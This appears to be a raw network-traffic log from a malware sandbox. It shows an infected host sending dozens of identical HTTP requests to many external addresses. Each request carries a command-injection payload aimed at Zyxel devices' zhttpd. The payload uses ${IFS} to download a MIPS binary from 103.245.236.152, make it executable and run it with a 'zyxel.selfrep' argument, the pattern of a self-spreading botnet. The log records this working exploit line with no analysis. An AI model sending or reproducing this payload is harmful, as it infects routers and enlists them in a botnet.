                                      Jan 14, 2024 15:50:39.125236988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2584192.168.2.145859450.232.242.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.125272989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2585192.168.2.1436510113.196.109.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.125325918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2586192.168.2.144912672.74.124.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.125363111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2587192.168.2.1447772175.33.75.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.125401020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2588192.168.2.1447746204.72.7.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.125435114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2589192.168.2.143964898.40.222.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.125487089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2590192.168.2.1435514212.234.10.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.125546932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2591192.168.2.1437290143.245.205.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.125576973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2592192.168.2.1454592212.126.31.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.125621080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2593192.168.2.1447444190.68.109.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.125642061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2594192.168.2.146059864.5.11.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.128321886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2595192.168.2.1440576161.96.180.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.128344059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2596192.168.2.1450022142.192.242.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.128401995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2597192.168.2.1458922177.152.43.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.128456116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2598192.168.2.1436764194.172.176.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.128492117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2599192.168.2.144357448.27.4.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.128508091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2600192.168.2.1448954172.69.72.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.128560066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2601192.168.2.143578854.252.181.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.128595114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2602192.168.2.143712885.35.115.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.128637075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2603192.168.2.1433982200.24.94.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.129164934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2604192.168.2.146006699.226.244.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.129198074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2605192.168.2.1441610103.148.188.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.129348993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2606192.168.2.1456476221.180.3.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.129395962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2607192.168.2.1454464184.165.202.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.129436016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2608192.168.2.144140623.66.83.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.129523039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2609192.168.2.145490071.91.77.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.129544973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2610192.168.2.1456280107.94.187.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.129595041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2611192.168.2.1437872170.158.9.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.129627943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2612192.168.2.1456036201.148.204.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.129676104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2613192.168.2.1441772168.15.106.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.129695892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2614192.168.2.1450068128.39.73.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.129755020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2615192.168.2.1459780158.67.216.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.129780054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2616192.168.2.143482677.82.116.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.129812956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2617192.168.2.146014618.34.121.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.129893064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2618192.168.2.145187242.156.217.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.129913092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2619192.168.2.1459722154.110.99.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.129944086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2620192.168.2.1456060154.46.93.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.138936996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2621192.168.2.1443080158.96.122.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.138972998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2622192.168.2.144057295.28.27.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139002085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2623192.168.2.1439260112.82.177.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139028072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2624192.168.2.1459340188.230.135.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139101028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2625192.168.2.1452860165.8.109.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139112949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2626192.168.2.14431988.139.95.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139174938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2627192.168.2.1448008140.255.93.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139215946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2628192.168.2.1459418209.224.91.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139244080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2629192.168.2.143906036.218.199.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139287949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2630192.168.2.144273495.120.96.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139295101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2631192.168.2.1441504155.129.3.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139349937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2632192.168.2.145167860.70.186.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139372110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2633192.168.2.1444566179.139.144.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139434099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2634192.168.2.1437766163.30.145.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139462948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2635192.168.2.1447904159.183.130.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139494896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2636192.168.2.1432828177.159.202.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139518023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2637192.168.2.1452566205.174.249.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139561892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2638192.168.2.1456016151.240.88.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139594078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2639192.168.2.1449922158.125.139.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139624119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2640192.168.2.1458218101.125.35.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139683008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2641192.168.2.145375698.155.64.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139708042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2642192.168.2.143815218.228.237.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139731884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2643192.168.2.1445000117.180.121.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139776945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2644192.168.2.1452478183.208.146.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139830112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2645192.168.2.143531043.68.154.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:40.139863014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2646192.168.2.143924032.197.175.217443
                                      TimestampBytes transferredDirectionData
